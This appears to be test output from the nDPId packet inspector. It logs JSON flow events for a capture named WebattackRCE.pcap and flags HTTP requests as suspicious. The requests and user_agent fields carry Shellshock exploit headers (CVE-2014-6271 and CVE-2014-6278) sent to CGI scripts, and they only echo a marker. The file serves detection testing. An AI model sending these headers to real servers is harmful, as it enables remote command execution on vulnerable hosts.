+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 